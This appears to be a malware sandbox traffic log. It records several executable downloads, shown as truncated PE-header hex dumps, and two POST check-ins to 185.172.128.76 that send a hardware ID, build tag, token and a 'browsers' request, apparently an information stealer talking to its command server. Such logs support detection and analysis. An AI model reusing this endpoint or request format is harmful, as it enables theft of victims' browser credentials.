00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 10:16:18 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 10:16:19 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 10:16:20 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 10:16:21 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Apr 2024 10:16:22 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Apr 2024 10:16:36 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 24 Apr 2024 21:15:46 GMTETag: "85400-616de2c892480"Accept-Ranges: bytesContent-Length: 545792Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9c 07 00 28 00 00 00 00 f0 07 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 6c 80 00 00 b0 80 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 af 06 00 00 10 00 00 00 b0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa e2 00 00 00 c0 06 00 00 e4 00 00 00 b4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 01 00 00 00 e0 07 00 00 02 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 28 00 00 00 f0 07 00 00 2a 00 00 00 a8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 80 00 00 00 20 08 00 00 82 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIJKKFHIEGCBGCAFIJHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 44 43 44 32 39 43 46 32 33 39 34 32 31 33 38 31 30 34 36 30 34 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 4b 4b 46 48 49 45 47 43 42 47 43 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="hwid"6DCD29CF23942138104604------AEHIJKKFHIEGCBGCAFIJContent-Disposition: form-data; name="build"default10------AEHIJKKFHIEGCBGCAFIJ--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBFCAFCBKFIEBFHIDBAHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 39 35 35 62 36 34 37 34 38 36 64 36 66 62 64 66 63 36 33 34 39 31 32 65 39 38 62 63 39 63 66 65 33 38 32 39 30 63 38 38 30 34 63 39 30 37 66 61 32 64 37 36 37 33 64 30 37 61 61 64 30 38 32 62 65 63 36 34 34 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 42 46 43 41 46 43 42 4b 46 49 45 42 46 48 49 44 42 41 2d 2d 0d 0a Data Ascii: ------KFBFCAFCBKFIEBFHIDBAContent-Disposition: form-data; name="token"99955b647486d6fbdfc634912e98bc9cfe38290c8804c907fa2d7673d07aad082bec644b------KFBFCAFCBKFIEBFHIDBAContent-Disposition: form-data; name="message"browsers------KFBFCAFCBKFIEBFHIDBA--
